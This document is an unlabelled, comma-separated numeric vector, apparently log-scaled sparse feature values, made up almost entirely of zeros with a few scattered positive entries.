0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.367295829986474, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.044522437723423, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4339872044851467, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 